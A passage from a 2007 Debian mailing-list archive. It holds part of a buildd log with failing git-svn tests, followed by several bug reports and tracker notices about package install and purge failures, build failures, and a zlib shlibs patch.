 (dsc) [804B]
 | Get:2 http://ftp.de.debian.org experimental/main git-core 1:1.5.3~rc0-1 
 (tar) [1484kB]
 | Get:3 http://ftp.de.debian.org experimental/main git-core 1:1.5.3~rc0-1 
 (diff) [142kB]
 | Fetched 1626kB in 33s (49.2kB/s)
 | Download complete and in download only mode
 | ** Using build dependencies supplied by package:
 | Build-Depends: libz-dev, libcurl3-gnutls-dev | libcurl3-dev, asciidoc ( 
 7.0.2-3), xmlto, libexpat1-dev, subversion, libsvn-perl | libsvn-core-perl, 
 unzip, tcl8.4
 | Checking for already installed source dependencies...
 ]...]
 | *** t9100-git-svn-basic.sh ***
 | define NO_SVN_TESTS to skip git-svn tests
 | * FAIL 1: initialize git-svn
 | 
 | mkdir import 
 | cd import 
 | echo foo  foo 
 | ln -s foo foo.link
 | mkdir -p dir/a/b/c/d/e 
 | echo 'deep dir'  dir/a/b/c/d/e/file 
 | mkdir bar 
 | echo 'zzz'  bar/zzz 
 | echo '#!/bin/sh'  exec.sh 
 | chmod +x exec.sh 
 | svn import -m 'import for git-svn' . 
 file:///build/buildd/git-core-1.5.3~rc0/t/trash/svnrepo /dev/null 
 | cd .. 
 | rm -rf import 
 | git-svn init 
 file:///build/buildd/git-core-1.5.3~rc0/t/trash/svnrepo
 | * FAIL 2: import an SVN revision into git
 | git-svn fetch
 | *   ok 3: checkout from svn
 | * FAIL 4: try a deep --rmdir with a commit
 | 
 | git checkout -f -b mybranch remotes/git-svn 
 | mv dir/a/b/c/d/e/file dir/file 
 | cp dir/file file 
 | git update-index --add --remove dir/a/b/c/d/e/file dir/file 
 file 
 | git commit -m 'try a deep --rmdir with a commit' 
 | git-svn set-tree --find-copies-harder --rmdir   
 remotes/git-svn..mybranch 
 | svn up 
 '/build/buildd/git-core-1.5.3~rc0/t/trash/.git/svn/git-svn/svn-tree' 
 | test -d 
 '/build/buildd/git-core-1.5.3~rc0/t/trash/.git/svn/git-svn/svn-tree'/dir  
 test ! -d 
 '/build/buildd/git-core-1.5.3~rc0/t/trash/.git/svn/git-svn/svn-tree'/dir/a
 | *   ok 5: detect node change from file to directory #1
 | *   ok 6: detect node change from directory to file #1
 | *   ok 7: detect node change from file to directory #2
 | *   ok 8: detect node change from directory to file #2
 | * FAIL 9: remove executable bit from a file
 | 
 | rm -f '/build/buildd/git-core-1.5.3~rc0/t/trash/.git'/index 
 | git checkout -f -b mybranch5 remotes/git-svn 
 | chmod -x exec.sh 
 | git update-index exec.sh 
 | git commit -m 'remove executable bit from a file' 
 | git-svn set-tree --find-copies-harder --rmdir   
 remotes/git-svn..mybranch5 
 | svn up 
 '/build/buildd/git-core-1.5.3~rc0/t/trash/.git/svn/git-svn/svn-tree' 
 | test ! -x 
 '/build/buildd/git-core-1.5.3~rc0/t/trash/.git/svn/git-svn/svn-tree'/exec.sh
 | * FAIL 10: add executable bit back file
 | 
 | chmod +x exec.sh 
 | git update-index exec.sh 
 | git commit -m 'add executable bit back file' 
 | git-svn set-tree --find-copies-harder --rmdir   
 remotes/git-svn..mybranch5 
 | svn up 
 '/build/buildd/git-core-1.5.3~rc0/t/trash/.git/svn/git-svn/svn-tree' 
 | test -x 
 '/build/buildd/git-core-1.5.3~rc0/t/trash/.git/svn/git-svn/svn-tree'/exec.sh
 | * FAIL 11: executable file becomes a symlink to bar/zzz (file)
 | 
 | rm exec.sh 
 | ln -s bar/zzz exec.sh 
 | git update-index exec.sh 
 | git commit -m 'executable file becomes a symlink to bar/zzz 
 (file)' 
 | git-svn set-tree --find-copies-harder --rmdir   
 remotes/git-svn..mybranch5 
 | svn up 
 '/build/buildd/git-core-1.5.3~rc0/t/trash/.git/svn/git-svn/svn-tree' 
 | test -L 
 '/build/buildd/git-core-1.5.3~rc0/t/trash/.git/svn/git-svn/svn-tree'/exec.sh
 | * FAIL 12: new symlink is added to a file that was also just made executable
 | 
 | chmod +x bar/zzz 
 | ln -s bar/zzz exec-2.sh 
 | 

Bug#431852: depends on non-essential package debconf in postrm

2007-07-05 Thread Michael Ablassmeier
Package: firebird2.0-classic
Version: 2.0.1.12855.ds1-7
Severity: serious
Usertags: postrm-depends-nonessential
User: [EMAIL PROTECTED]
Justification: Policy violation, see section 7.2

hi,

while running archive wide piuparts tests your package failed on purge
because of debconf beeing unavailable during postrm:

  Removing firebird2.0-classic ...
  /var/lib/dpkg/info/firebird2.0-classic.prerm: line 18: 
  /usr/share/debconf/confmodule: No such file or directory
  dpkg: error processing firebird2.0-classic (--purge):
   subprocess pre-removal script returned error exit status 1
  /var/lib/dpkg/info/firebird2.0-classic.postinst: line 5: 
  /usr/share/debconf/confmodule: No such file or directory
  dpkg: error while cleaning up:
   subprocess post-installation script returned error exit status 1
  Errors were encountered while processing:
   firebird2.0-classic

please be sure to use a conditional call to debconf and its commands (this is
just an example):

--
 if [ -f /usr/share/debconf/confmodule ]; then
. /usr/share/debconf/confmodule
 fi

 db_get ||:
--

bye,
- michael


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431853: depends on non-essential package adduser in postrm

2007-07-05 Thread Michael Ablassmeier
Package: amavisd-new
Version: 1:2.4.2-6.2
Severity: serious
Usertags: postrm-depends-nonessential
User: [EMAIL PROTECTED]
Justification: Policy violation, see section 7.2

hi,

while running archive wide piuparts tests your package failed on purge
because of adduser beeing unavailable during postrm:

  Removing amavisd-new ...
  Purging configuration files for amavisd-new ...
  dpkg: error processing amavisd-new (--purge):
   subprocess post-removal script returned error exit status 1
  Errors were encountered while processing:
   amavisd-new

looking at your postrm script you seem to call adduser without
checking for its existance:

getent passwd amavis /dev/null  deluser amavis
getent group amavis /dev/null  delgroup amavis

the full log can be found here:

 http://people.debian.org/~lucas/logs/2007/07/01/

bye,
- michael


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431851: depends on non-essential package debconf in postrm

2007-07-05 Thread Michael Ablassmeier
Package: firebird1.5-classic
Version: 1.5.4.4910rel-6
Severity: serious
Usertags: postrm-depends-nonessential
User: [EMAIL PROTECTED]
Justification: Policy violation, see section 7.2

hi,

while running archive wide piuparts tests your package failed on purge
because of debconf beeing unavailable during postrm:

  Removing firebird1.5-classic ...
  Purging configuration files for firebird1.5-classic ...
  /var/lib/dpkg/info/firebird1.5-classic.postrm: line 5: 
  /usr/share/debconf/confmodule: No such file or directory
  dpkg: error processing firebird1.5-classic (--purge):
   subprocess post-removal script returned error exit status 1
  Errors were encountered while processing:
   firebird1.5-classic

please be sure to use a conditional call to debconf and its commands (this is
just an example):

--
 if [ -f /usr/share/debconf/confmodule ]; then
. /usr/share/debconf/confmodule
 fi

 db_get ||:
--

bye,
- michael


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#422032: marked as done (gnushogi: Package fails to install, making it mostly useless)

2007-07-05 Thread Debian Bug Tracking System
Your message dated Thu, 05 Jul 2007 13:02:02 +
with message-id [EMAIL PROTECTED]
and subject line Bug#422032: fixed in gnushogi 1.3.2-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: gnushogi
Version: 1.3.2-1
Severity: grave

Setting up gnushogi (1.3.2-1) ...

No `START-INFO-DIR-ENTRY' and no `This file documents'.
install-info(/usr/share/info/gnushogi.info): unable to determine description 
for `dir' entry - giving up
dpkg: error processing gnushogi (--configure):
 subprocess post-installation script returned error exit status 1
Errors were encountered while processing:
 gnushogi


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (990, 'unstable'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.21.1-skas3-v8.2 (SMP w/2 CPU cores; PREEMPT)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages gnushogi depends on:
ii  libc6 2.5-5  GNU C Library: Shared libraries
ii  libncurses5   5.5-5  Shared libraries for terminal hand

gnushogi recommends no packages.

-- no debconf information

-- 
Reinhart was never his mother's favorite -- and he was an only
child. Thomas Berger
Manoj Srivastava [EMAIL PROTECTED] http://www.golden-gryphon.com/
1024D/BF24424C print 4966 F272 D093 B493 410B  924B 21BA DABB BF24 424C

---End Message---
---BeginMessage---
Source: gnushogi
Source-Version: 1.3.2-2

We believe that the bug you reported is fixed in the latest version of
gnushogi, which is due to be installed in the Debian FTP archive:

gnushogi_1.3.2-2.diff.gz
  to pool/main/g/gnushogi/gnushogi_1.3.2-2.diff.gz
gnushogi_1.3.2-2.dsc
  to pool/main/g/gnushogi/gnushogi_1.3.2-2.dsc
gnushogi_1.3.2-2_i386.deb
  to pool/main/g/gnushogi/gnushogi_1.3.2-2_i386.deb
xshogi_1.3.2-2_i386.deb
  to pool/main/g/gnushogi/xshogi_1.3.2-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Daniel Baumann [EMAIL PROTECTED] (supplier of updated gnushogi package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Thu,  5 Jul 2007 14:50:00 +0200
Source: gnushogi
Binary: gnushogi xshogi
Architecture: source i386
Version: 1.3.2-2
Distribution: unstable
Urgency: medium
Maintainer: Daniel Baumann [EMAIL PROTECTED]
Changed-By: Daniel Baumann [EMAIL PROTECTED]
Description: 
 gnushogi   - A program to play shogi, the Japanese version of chess
 xshogi - An X Window System Japanese Chess (Shogi) Board
Closes: 422032
Changes: 
 gnushogi (1.3.2-2) unstable; urgency=medium
 .
   * Added patch from Rene Mayorga [EMAIL PROTECTED] to add missing
 header entries to the info file (Closes: #422032).
Files: 
 720d1d70784c04aeff007d9d51d7b698 653 games optional gnushogi_1.3.2-2.dsc
 e52a34a64909a4cc9ec1bed6aebe30b0 27921 games optional gnushogi_1.3.2-2.diff.gz
 3cf0116bbf1836fbeab7d28f54a6ce81 245032 games optional 
gnushogi_1.3.2-2_i386.deb
 a123ee1c60c156a1891660228b675d9e 67488 games optional xshogi_1.3.2-2_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGjOnZ+C5cwEsrK54RArIyAKDAewhpY2XVzD8x5MKkJw8CiRRclwCgtXHo
wpkdP5cToJl7FzRBGXW9HOg=
=5Lwt
-END PGP SIGNATURE-

---End Message---


Bug#431855: piuparts test: fails to remove: post-removal script returned error exit status 20

2007-07-05 Thread Michael Ablassmeier
Package: isdnutils-base
Version: 1:3.9.20060704-3
Severity: serious

hi,

while running archive wide piuparts tests your package failed on remove with
the following error: 

  Removing isdnutils-base ...
  Purging configuration files for isdnutils-base ...
  There are still files in /etc/isdn/ that you may want to remove manually.
  dpkg: error processing isdnutils-base (--purge):
   subprocess post-removal script returned error exit status 20
  Errors were encountered while processing:
   isdnutils-base

the full log can be found here:

 http://people.debian.org/~lucas/logs/2007/07/01/

bye,
- michael


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431856: piuparts test: fails to install: xargs: /usr/lib/oo2c/ooconfig: No such file or directory

2007-07-05 Thread Michael Ablassmeier
Package: libooc-xml-dev
Version: 3.2.0-2
Severity: serious

hi,

while running archive wide piuparts tests your package failed on install with
the following error: 

  Setting up libooc-xml-dev (3.2.0-2) ...
  xargs: /usr/lib/oo2c/ooconfig: No such file or directory
  dpkg: error processing libooc-xml-dev (--configure):
   subprocess post-installation script returned error exit status 127
  Errors were encountered while processing:
   libooc-xml-dev
  E: Sub-process /usr/bin/dpkg returned an error code (1)

the full log can be found here:

 http://people.debian.org/~lucas/logs/2007/07/01/

bye,
- michael


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431857: piuparts test: fails to install: ghc-pkg: dependency MissingH-0.18.3 doesn't exist

2007-07-05 Thread Michael Ablassmeier
Package: libghc6-anydbm-dev
Version: 1.0.3
Severity: serious

hi,

while running archive wide piuparts tests your package failed on install with
the following error: 

  Setting up libghc6-anydbm-dev (1.0.3) ...
  Reading package info from stdin ... done.
  ghc-pkg: dependency MissingH-0.18.3 doesn't exist (use --force to override)
  dpkg: error processing libghc6-anydbm-dev (--configure):
   subprocess post-installation script returned error exit status 1
  Errors were encountered while processing:
   libghc6-anydbm-dev
  E: Sub-process /usr/bin/dpkg returned an error code (1)

the full log can be found here:

 http://people.debian.org/~lucas/logs/2007/07/01/

bye,
- michael


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: tagging 431855

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.9.26
 tags 431855 + etch-ignore
Bug#431855: piuparts test: fails to remove: post-removal script returned error 
exit status 20
There were no tags set.
Tags added: etch-ignore


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431837: hal fails to configure in buildd chroots

2007-07-05 Thread Julien Cristau
On Thu, Jul  5, 2007 at 16:25:01 +0200, Michael Biebl wrote:

 TBH, I think the dependencies of kde-devel are broken, if they pull in
 hal as a build-dependency.

It rather seems that uim should not build-depend on kde-devel, as this
package is just a metapackage for users, not meant for other packages:
 This metapackage includes official KDE modules that are useful to
 developers, including KDE's software development kit (SDK), Qt3's
 designer tool, and all core KDE header and development packages.

Cheers,
Julien


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431837: hal fails to configure in buildd chroots

2007-07-05 Thread Michael Biebl
Andreas Barth wrote:
 Package: hal
 Version: 0.5.9.1-1
 Severity: grave
 
 Hi,
 
 hal fails to configure correctly inside of buildd chroots, see e.g.
 http://buildd.debian.org/fetch.cgi?pkg=uimver=1%3A1.4.1-4arch=i386stamp=1182471498file=log
 
 Setting up hal (0.5.9.1-1) ...
 chage: the shadow password file is not present
 /usr/bin/chage failed with return code 15, shadow not enabled, password
 aging cannot be set. Continuing.
 Reloading system message bus config...done.
 Starting Hardware abstraction layer: haldinvoke-rc.d: initscript hal,
 action start failed.

TBH, I think the dependencies of kde-devel are broken, if they pull in
hal as a build-dependency.
Concerning the build failure: I guess it is, that the haldaemon user was
not correctly created und thus hald fails to start. Could you verify
that? Are there any special modifications to adduser/shadow etc on this
buildd?

Michael

-- 
Why is it that all of the instruments seeking intelligent life in the
universe are pointed away from Earth?



signature.asc
Description: OpenPGP digital signature


Bug#422396: [Monotone-devel] Packages for Debian testing

2007-07-05 Thread Shaun Jackman

Hi, Richard.

You can always cc [EMAIL PROTECTED] That will reach the maintainer
and anyone who has subscribed.

Cheers,
Shaun

On 7/5/07, Richard Levitte [EMAIL PROTECTED] wrote:

Hi,

I'm looking through the current monotone bugs in TBS.  Which of you do
I talk to about them?

One bug report doesn't belong with monotone: 422396.  It's either a
bug in the default make rules or a bug with pdfetex.

Cheers,
Richard



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431865: gcj-4.1 FTBFS on hppa

2007-07-05 Thread Andreas Barth
Package: gcj-4.1
Version: 4.1.2-12
Severity: serious

Hi,

this package FTBFS on hppa, please see
http://buildd.debian.org/fetch.cgi?pkg=gcj-4.1ver=4.1.2-12arch=hppastamp=1181614009file=log

/build/buildd/gcj-4.1-4.1.2/build/gcc/gcj 
-B/build/buildd/gcj-4.1-4.1.2/build/hppa-linux-gnu/libjava/ 
-B/build/buildd/gcj-4.1-4.1.2/build/gcc/ -C -g -w --encoding=UTF-8 
-bootclasspath '' --classpath 
/build/buildd/gcj-4.1-4.1.2/src/libjava:/build/buildd/gcj-4.1-4.1.2/build/hppa-linux-gnu/libjava:../../../../../src/libjava/classpath:../../../../../src/libjava/classpath/external/w3c_dom:../../../../../src/libjava/classpath/external/sax:../../../../../src/libjava/classpath/external/relaxngDatatype:../../../../../src/libjava/classpath/external/jsr166:.::
 -d ../../../../../src/libjava/classpath/lib @classes
Exception in thread main java.lang.ArrayIndexOutOfBoundsException
   at java.lang.String.init(libgcj.so.71)
   at java.lang.String.init(libgcj.so.71)
   at java.lang.StringBuffer.toString(libgcj.so.71)
   at org.eclipse.jdt.internal.compiler.batch.Main$Logger.logException(ecj1)
   at org.eclipse.jdt.internal.compiler.batch.Main.compile(ecj1)
   at org.eclipse.jdt.internal.compiler.batch.GCCMain.compile(ecj1)
   at org.eclipse.jdt.internal.compiler.batch.GCCMain.main(ecj1)

I fear this needs some porting work as well, so Ccing [EMAIL PROTECTED] (via 
bugs.d.o).



Cheers,
Andi
-- 
  http://home.arcor.de/andreas-barth/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431874: strongswan - FTBFS: cannot create regular file `/etc/ipsec.conf': Permission denied

2007-07-05 Thread Bastian Blank
Package: strongswan
Version: 4.1.4-1
Severity: serious

There was an error while trying to autobuild your package:

 Automatic build of strongswan_4.1.4-1 on debian-31.osdl.marist.edu by 
 sbuild/s390 98
[...]
 Making install in stroke
 make[3]: Entering directory `/build/buildd/strongswan-4.1.4/src/stroke'
 make[4]: Entering directory `/build/buildd/strongswan-4.1.4/src/stroke'
 make[4]: Nothing to be done for `install-exec-am'.
 test -z /usr/lib/ipsec || mkdir -p -- 
 /build/buildd/strongswan-4.1.4/debian/strongswan/usr/lib/ipsec
   /bin/sh ../../libtool --mode=install /usr/bin/install -c 'stroke' 
 '/build/buildd/strongswan-4.1.4/debian/strongswan/usr/lib/ipsec/stroke'
 /usr/bin/install -c stroke 
 /build/buildd/strongswan-4.1.4/debian/strongswan/usr/lib/ipsec/stroke
 make[4]: Leaving directory `/build/buildd/strongswan-4.1.4/src/stroke'
 make[3]: Leaving directory `/build/buildd/strongswan-4.1.4/src/stroke'
 Making install in starter
 make[3]: Entering directory `/build/buildd/strongswan-4.1.4/src/starter'
 make[4]: Entering directory `/build/buildd/strongswan-4.1.4/src/starter'
 test -e /etc/ipsec.conf || /usr/bin/install -c ipsec.conf /etc/ipsec.conf
 /usr/bin/install: cannot create regular file `/etc/ipsec.conf': Permission 
 denied
 make[4]: *** [install-exec-local] Error 1
 make[4]: Leaving directory `/build/buildd/strongswan-4.1.4/src/starter'
 make[3]: *** [install-am] Error 2
 make[3]: Leaving directory `/build/buildd/strongswan-4.1.4/src/starter'
 make[2]: *** [install-recursive] Error 1
 make[2]: Leaving directory `/build/buildd/strongswan-4.1.4/src'
 make[1]: *** [install-recursive] Error 1
 make[1]: Leaving directory `/build/buildd/strongswan-4.1.4'
 make: *** [install-strongswan] Error 2
 **
 Build finished at 20070704-2053
 FAILED [dpkg-buildpackage died]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431873: udeb is missing in .shlibs

2007-07-05 Thread Jérémy Bobbio
Package: zlib1g
Version: 1:1.2.3.3.dfsg-3
Severity: serious
Tags: patch, d-i

It seems that in fixing #431124, you have removed the .shlibs entry
mentioning zlib1g-udeb.  This currently breaks the debian-installer
builds as udeb depending on zlib1g doesn't reference the correct package
anymore.

The attached patch should fix this issue.

Cheers,
-- 
Jérémy Bobbio.''`. 
[EMAIL PROTECTED]: :Ⓐ  :  # apt-get install anarchism
`. `'` 
  `-   
diff -u zlib-1.2.3.3.dfsg/debian/rules zlib-1.2.3.3.dfsg/debian/rules
--- zlib-1.2.3.3.dfsg/debian/rules
+++ zlib-1.2.3.3.dfsg/debian/rules
@@ -138,7 +138,8 @@
dh_strip -s --dbg-package=zlib1g-dbg
dh_compress -s
dh_fixperms -s
-   dh_makeshlibs -s -Vzlib1g (= 1:1.2.3.3.dfsg-1)
+   dh_makeshlibs -s -Vzlib1g (= 1:1.2.3.3.dfsg-1) \
+   --add-udeb=zlib1g-udeb
dh_installdeb -s
dh_shlibdeps -s
dh_gencontrol -s


signature.asc
Description: Digital signature


Bug#431875: referencer - FTBFS: error: expected constructor, destructor, or type conversion before '*' token

2007-07-05 Thread Bastian Blank
Package: referencer
Version: 1.0.2-1+b1
Severity: serious

There was an error while trying to autobuild your package:

 Automatic build of referencer_1.0.2-1+b1 on lxdebian.bfinv.de by sbuild/s390 
 98
[...]
 Making all in src
 make[3]: Entering directory `/build/buildd/referencer-1.0.2/src'
 g++ -DHAVE_CONFIG_H -I. -I. -I.. -DDATADIR=\/usr/share/referencer\   -g 
 -Wall -O2 -DORBIT2=1 -pthread -I/usr/include/libgnomeuimm-2.6 
 -I/usr/lib/libgnomeuimm-2.6/include -I/usr/include/libgnomemm-2.6 
 -I/usr/lib/libgnomemm-2.6/include -I/usr/include/libgnomecanvasmm-2.6 
 -I/usr/lib/libgnomecanvasmm-2.6/include -I/usr/include/gconfmm-2.6 
 -I/usr/lib/gconfmm-2.6/include -I/usr/include/libglademm-2.4 
 -I/usr/lib/libglademm-2.4/include -I/usr/include/libgnomeui-2.0 
 -I/usr/include/gnome-vfsmm-2.6 -I/usr/lib/gnome-vfsmm-2.6/include 
 -I/usr/include/gtkmm-2.4 -I/usr/lib/gtkmm-2.4/include 
 -I/usr/include/libgnome-2.0 -I/usr/include/glibmm-2.4 
 -I/usr/lib/glibmm-2.4/include -I/usr/include/gdkmm-2.4 
 -I/usr/lib/gdkmm-2.4/include -I/usr/include/pangomm-1.4 
 -I/usr/include/atkmm-1.6 -I/usr/include/gtk-2.0 -I/usr/include/sigc++-2.0 
 -I/usr/lib/sigc++-2.0/include -I/usr/include/glib-2.0 
 -I/usr/lib/glib-2.0/include -I/usr/lib/gtk-2.0/include 
 -I/usr/include/cairomm-1.0 -I/usr/include/pango-1.0 -I/usr/include/cairo 
 -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/include/atk-1.0 
 -I/usr/include/orbit-2.0 -I/usr/include/gconf/2 -I/usr/include/gnome-vfs-2.0 
 -I/usr/lib/gnome-vfs-2.0/include -I/usr/include/libbonobo-2.0 
 -I/usr/include/bonobo-activation-2.0 -I/usr/include/libgnomecanvas-2.0 
 -I/usr/include/libart-2.0 -I/usr/include/libglade-2.0 -I/usr/include/libxml2 
 -I/usr/include/libbonoboui-2.0 -I/usr/include/gnome-keyring-1 
 -I/usr/include/poppler   -I.. -g -Wall -O2 -c -o TagWindow.o TagWindow.C
 /usr/include/gconfmm-2.6/gconfmm/setinterface.h:42: warning: 'class 
 Gnome::Conf::SetInterface' has virtual functions but non-virtual destructor
 /usr/include/gnome-vfsmm-2.6/libgnomevfsmm/mime-handlers.h:75: error: 
 expected constructor, destructor, or type conversion before '*' token
 make[3]: *** [TagWindow.o] Error 1
 make[3]: Leaving directory `/build/buildd/referencer-1.0.2/src'
 make[2]: *** [all-recursive] Error 1
 make[2]: Leaving directory `/build/buildd/referencer-1.0.2'
 make[1]: *** [all] Error 2
 make[1]: Leaving directory `/build/buildd/referencer-1.0.2'
 make: *** [debian/stamp-makefile-build] Error 2
 **
 Build finished at 20070703-2057
 FAILED [dpkg-buildpackage died]



Bug#431873: udeb is missing in .shlibs

2007-07-05 Thread Mark Brown
tag 431873 - patch
thanks

On Thu, Jul 05, 2007 at 06:49:51PM +0200, Jérémy Bobbio wrote:

 The attached patch should fix this issue.

Only for the d-i case, unfortunately.  The cross library packages also
have the same problem and it looks like they can't be fixed without
doing the shlibs by hand.

Expect a fix tomorrow evening.

-- 
You grabbed my hand and we fell into it, like a daydream - or a fever.


signature.asc
Description: Digital signature


Bug#431511: marked as done (depends on non-essential package adduser in postrm)

2007-07-05 Thread Debian Bug Tracking System
Your message dated Thu, 05 Jul 2007 17:47:03 +
with message-id [EMAIL PROTECTED]
and subject line Bug#431511: fixed in armagetronad 0.2.8.2.1-6
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: armagetronad-dedicated
Version: 0.2.8.2.1-4
Severity: serious
Usertags: postrm-depends-nonessential
Justification: Policy violation, see section 7.2

hi,

while running archive wide piuparts tests your package failed on purge
because of adduser beeing unavailable during postrm:

  Removing armagetronad-dedicated ...
  Purging configuration files for armagetronad-dedicated ...
  /var/lib/dpkg/info/armagetronad-dedicated.postrm: line 5: deluser: command 
not found
  dpkg: error processing armagetronad-dedicated (--purge):
   subprocess post-removal script returned error exit status 127
  Errors were encountered while processing:
   armagetronad-dedicated

the full log can be found here:

 http://people.debian.org/~lucas/logs/2007/07/01/armagetronad-dedicated.log

bye,
- michael

---End Message---
---BeginMessage---
Source: armagetronad
Source-Version: 0.2.8.2.1-6

We believe that the bug you reported is fixed in the latest version of
armagetronad, which is due to be installed in the Debian FTP archive:

armagetron-common_0.2.8.2.1-6_all.deb
  to pool/main/a/armagetronad/armagetron-common_0.2.8.2.1-6_all.deb
armagetron-server_0.2.8.2.1-6_all.deb
  to pool/main/a/armagetronad/armagetron-server_0.2.8.2.1-6_all.deb
armagetron_0.2.8.2.1-6_all.deb
  to pool/main/a/armagetronad/armagetron_0.2.8.2.1-6_all.deb
armagetronad-common_0.2.8.2.1-6_all.deb
  to pool/main/a/armagetronad/armagetronad-common_0.2.8.2.1-6_all.deb
armagetronad-dedicated_0.2.8.2.1-6_i386.deb
  to pool/main/a/armagetronad/armagetronad-dedicated_0.2.8.2.1-6_i386.deb
armagetronad_0.2.8.2.1-6.diff.gz
  to pool/main/a/armagetronad/armagetronad_0.2.8.2.1-6.diff.gz
armagetronad_0.2.8.2.1-6.dsc
  to pool/main/a/armagetronad/armagetronad_0.2.8.2.1-6.dsc
armagetronad_0.2.8.2.1-6_i386.deb
  to pool/main/a/armagetronad/armagetronad_0.2.8.2.1-6_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Christine Spang [EMAIL PROTECTED] (supplier of updated armagetronad package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Wed, 04 Jul 2007 21:45:00 +
Source: armagetronad
Binary: armagetron-common armagetronad-common armagetronad armagetron-server 
armagetron armagetronad-dedicated
Architecture: source all i386
Version: 0.2.8.2.1-6
Distribution: unstable
Urgency: low
Maintainer: [EMAIL PROTECTED]
Changed-By: Christine Spang [EMAIL PROTECTED]
Description: 
 armagetron - Dummy upgrade package for Armagetron
 armagetron-common - Dummy upgrade package for Armagetron
 armagetron-server - Dummy upgrade package for Armagetron
 armagetronad - 3D Tron-like high speed game
 armagetronad-common - Common files for the Armagetron Advanced packages
 armagetronad-dedicated - dedicated game server for Armagetron Advanced
Closes: 431511
Changes: 
 armagetronad (0.2.8.2.1-6) unstable; urgency=low
 .
   * armagetronad-dedicated Pre-Depends on adduser since its postinst uses it.
   * Use userdel rather than deluser to remove the armagetronad system
 user. (Closes: #431511)
   * Use ${source:Version} instead of the deprecated ${Source-Version} in
 debian/control
   * Use [ ! -f Makefile ] || $(MAKE) distclean instead of ignoring distclean
 errors. Thanks, lintian.
Files: 
 f73ab1844b71e55520bf670d4862b846 891 games optional 
armagetronad_0.2.8.2.1-6.dsc
 5cce3e39ab9486598c18ca3adcd5b3dc 33054 games optional 
armagetronad_0.2.8.2.1-6.diff.gz
 09d5198c8215199cb3bf460339e35d45 283290 games optional 
armagetronad-common_0.2.8.2.1-6_all.deb
 c5987e38c30e7184988711f3af756249 7100 games optional 
armagetron_0.2.8.2.1-6_all.deb
 02a7e52a53bf1d6fadb779a55910d000 7014 games optional 
armagetron-common_0.2.8.2.1-6_all.deb
 8e4a96a32e872aabb7c3aaad37ebd4c4 7126 games optional 
armagetron-server_0.2.8.2.1-6_all.deb
 4216497d57f57c51355ae47f09ba5639 1321336 games optional 
armagetronad_0.2.8.2.1-6_i386.deb
 

Bug#431873: udeb is missing in .shlibs

2007-07-05 Thread Mark Brown
On Thu, Jul 05, 2007 at 06:49:51PM +0200, Jérémy Bobbio wrote:

 It seems that in fixing #431124, you have removed the .shlibs entry
 mentioning zlib1g-udeb.  This currently breaks the debian-installer
 builds as udeb depending on zlib1g doesn't reference the correct package
 anymore.

That's not from #431124, it's from converting to use debhelper which
isn't quite as helpful as I'd like about shared libraries.

-- 
You grabbed my hand and we fell into it, like a daydream - or a fever.


signature.asc
Description: Digital signature


Bug#431883: dcraw license does not give permission to distribute modified versions or source alongside

